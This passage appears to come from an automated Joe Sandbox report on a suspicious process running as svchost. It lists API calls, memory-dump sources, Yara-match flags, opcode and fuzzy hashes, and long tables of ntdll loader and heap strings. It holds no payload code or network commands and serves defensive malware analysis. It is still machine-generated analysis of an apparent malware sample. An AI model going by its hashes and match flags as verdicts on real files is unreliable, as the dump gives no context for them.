                                                                                                              • Opcode ID: 10307aeb891519fc7c99e3c23575f98c41ed2e7d545c57804a02d36b1c5771eb
                                                                                                              • Instruction ID: b350f2cce0beea6be89d4c55736afbe9447f030722036109dcded40916d4fd72
                                                                                                              • Opcode Fuzzy Hash: 10307aeb891519fc7c99e3c23575f98c41ed2e7d545c57804a02d36b1c5771eb
                                                                                                              • Instruction Fuzzy Hash: EEF0B4B2A0535C7ADB125EE56C81CFFB77CDE81359B4180ABF904A7201E53D4F064BA5

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 89 42c7c3-42c804 call 404943 call 42d6b3 RtlFreeHeap
                                                                                                              APIs
                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C7FF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeHeap
                                                                                                              • String ID: 'cA
                                                                                                              • API String ID: 3298025750-2370355221
                                                                                                              • Opcode ID: acfefdb3a80356bd212f12599f516ba1239d1a9b6fdfdac714d478c0783a85cf
                                                                                                              • Instruction ID: 555028ebcc251f7093260877fd94d5e3d617086eeaae4aa5e860ebc1e4e76462
                                                                                                              • Opcode Fuzzy Hash: acfefdb3a80356bd212f12599f516ba1239d1a9b6fdfdac714d478c0783a85cf
                                                                                                              • Instruction Fuzzy Hash: 8CE092B1304604BBD610EE69DC41F9B33ACEFC9714F00401DFA18A7281D670B9108BB5

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 454 42c773-42c7b4 call 404943 call 42d6b3 RtlAllocateHeap
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(?,0041E41E,?,?,00000000,?,0041E41E,?,?,?), ref: 0042C7AF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              • Opcode ID: f4b77f2273dec16019d8b920b36054b3065a8ee74ed619d9597814caa3e3fcfc
                                                                                                              • Instruction ID: 89f1ee057969176d8101756f1d7f41c693a876ba1827579d7fa95cacfa7a8a70
                                                                                                              • Opcode Fuzzy Hash: f4b77f2273dec16019d8b920b36054b3065a8ee74ed619d9597814caa3e3fcfc
                                                                                                              • Instruction Fuzzy Hash: FAE039B17042047BD614EE69DC41E9B33ACEFC9714F004019B908A7241D670BA108AB4

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 464 42c813-42c84f call 404943 call 42d6b3 ExitProcess
                                                                                                              APIs
                                                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,FE55239A,?,?,FE55239A), ref: 0042C84A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExitProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 621844428-0
                                                                                                              • Opcode ID: 37220d6bb7d26430c9c2d261d1f34f052576513aa5a3cfc15d8dcd44f9992afe
                                                                                                              • Instruction ID: e18374c5559ab9fc5c5b6c15d37306319b5ce2a2461c20285597c081504b34a8
                                                                                                              • Opcode Fuzzy Hash: 37220d6bb7d26430c9c2d261d1f34f052576513aa5a3cfc15d8dcd44f9992afe
                                                                                                              • Instruction Fuzzy Hash: D8E04F716006147BD120FA6ADC01F9B775CDFC5714F00442AFA08A7241CA71791186F4

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 469 3b72c0a-3b72c0f 470 3b72c11-3b72c18 469->470 471 3b72c1f-3b72c26 LdrInitializeThunk 469->471
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: c0418dbe30e96baf6200ef13fd143734ee9ab98a6a8c039403ced0db8299121c
                                                                                                              • Instruction ID: 2d487d78435103e02e83cb6e19726c3fe49692e4e1fd981e6f54681be026d0e3
                                                                                                              • Opcode Fuzzy Hash: c0418dbe30e96baf6200ef13fd143734ee9ab98a6a8c039403ced0db8299121c
                                                                                                              • Instruction Fuzzy Hash: D9B09B729015C5C6DA11F77046087177905E7D0705F59C4F1D3134646E4739C1D1E175
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-2160512332
                                                                                                              • Opcode ID: 096d41d88e939e6ccf7308d723033825cfc57407492e94b27b86967711eaf9cb
                                                                                                              • Instruction ID: 1a322a24e684f4f9d6bdef06fd434efbcae922b5a2ced3147a7cb9e5cb62d822
                                                                                                              • Opcode Fuzzy Hash: 096d41d88e939e6ccf7308d723033825cfc57407492e94b27b86967711eaf9cb
                                                                                                              • Instruction Fuzzy Hash: 14925C75604741AFD724DE14C884BAAB7F8EB84758F084DBDFA98DB250DBB0E844CB52
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-3089669407
                                                                                                              • Opcode ID: 31a87270b27f052d7de45e0e2e04fcd1a366ff0ba2c6a8f3938eae7d4a54ae68
                                                                                                              • Instruction ID: 5c708a20d7dd229fb92db42a0962ddf23fa10d616197322428cd23f8b8a9ce15
                                                                                                              • Opcode Fuzzy Hash: 31a87270b27f052d7de45e0e2e04fcd1a366ff0ba2c6a8f3938eae7d4a54ae68
                                                                                                              • Instruction Fuzzy Hash: E08101B2D122186F8B25FB98EDC5EEEB7BDAB15614B044572B910FB114E770ED048BA0
                                                                                                              Strings
                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03BA54E2
                                                                                                              • I_wI_w@4_w@4_w, xrefs: 03BA5341, 03BA534D
                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 03BA5543
                                                                                                              • Thread identifier, xrefs: 03BA553A
                                                                                                              • double initialized or corrupted critical section, xrefs: 03BA5508
                                                                                                              • Invalid debug info address of this critical section, xrefs: 03BA54B6
                                                                                                              • corrupted critical section, xrefs: 03BA54C2
                                                                                                              • Critical section debug info address, xrefs: 03BA541F, 03BA552E
                                                                                                              • Address of the debug info found in the active list., xrefs: 03BA54AE, 03BA54FA
                                                                                                              • undeleted critical section in freed memory, xrefs: 03BA542B
                                                                                                              • Critical section address., xrefs: 03BA5502
                                                                                                              • Critical section address, xrefs: 03BA5425, 03BA54BC, 03BA5534
                                                                                                              • 8, xrefs: 03BA52E3
                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03BA54CE
                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03BA540A, 03BA5496, 03BA5519
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory$I_wI_w@4_w@4_w
                                                                                                              • API String ID: 0-4161880443
                                                                                                              • Opcode ID: 628687957c29558694ed17aa2393f6e0aef91a9b54719d1ec9a1a2d5f830a560
                                                                                                              • Instruction ID: b039365faca440efeac189cb215fa2d4cda356003bd3d60d8838e86bd836354e
                                                                                                              • Opcode Fuzzy Hash: 628687957c29558694ed17aa2393f6e0aef91a9b54719d1ec9a1a2d5f830a560
                                                                                                              • Instruction Fuzzy Hash: 4981B470A00758EFDB20CF98D841BAEBBB5FB45708F5441AAF518FB251D775AA40CB60
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                              Strings
                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 03B2D2C3
                                                                                                              • @, xrefs: 03B2D0FD
                                                                                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 03B2D146
                                                                                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 03B2D262
                                                                                                              • @, xrefs: 03B2D313
                                                                                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 03B2D196
                                                                                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 03B2D0CF
                                                                                                              • @, xrefs: 03B2D2AF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                              Strings
                                                                                                              • @, xrefs: 03B49EE7
                                                                                                              • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 03B976EE
                                                                                                              • sxsisol_SearchActCtxForDllName, xrefs: 03B976DD
                                                                                                              • Internal error check failed, xrefs: 03B97718, 03B978A9
                                                                                                              • minkernel\ntdll\sxsisol.cpp, xrefs: 03B97713, 03B978A4
                                                                                                              • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 03B97709
                                                                                                              • Status != STATUS_NOT_FOUND, xrefs: 03B9789A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-792281065
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 03BA8181, 03BA81F5
                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 03BA81E5
                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 03BA8170
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 03B6C6C3
                                                                                                              • LdrpInitializeImportRedirection, xrefs: 03BA8177, 03BA81EB
                                                                                                              • LdrpInitializeProcess, xrefs: 03B6C6C4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                              • API String ID: 0-475462383
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                                                              • API String ID: 0-3127649145
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                                              • API String ID: 0-3393094623
                                                                                                              Strings
                                                                                                              • WindowsExcludedProcs, xrefs: 03B5522A
                                                                                                              • Kernel-MUI-Number-Allowed, xrefs: 03B55247
                                                                                                              • Kernel-MUI-Language-SKU, xrefs: 03B5542B
                                                                                                              • Kernel-MUI-Language-Disallowed, xrefs: 03B55352
                                                                                                              • Kernel-MUI-Language-Allowed, xrefs: 03B5527B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                              • API String ID: 0-258546922
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                                              • API String ID: 0-2518169356
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-1975516107
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                              • API String ID: 0-3061284088
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                              • API String ID: 0-3178619729
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-3570731704
                                                                                                              Strings
                                                                                                              • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 03B97D03
                                                                                                              • SsHd, xrefs: 03B4A885
                                                                                                              • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 03B97D56
                                                                                                              • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 03B97D39
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                                              • API String ID: 0-2905229100
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                              • API String ID: 0-3178619729
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                              • API String ID: 0-379654539
                                                                                                              Strings
                                                                                                              • HEAP[%wZ]: , xrefs: 03B954D1, 03B95592
                                                                                                              • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 03B954ED
                                                                                                              • HEAP: , xrefs: 03B954E0, 03B955A1
                                                                                                              • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 03B955AE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                              • API String ID: 0-1657114761
                                                                                                              Strings
                                                                                                              • .Local, xrefs: 03B628D8
                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 03BA21D9, 03BA22B1
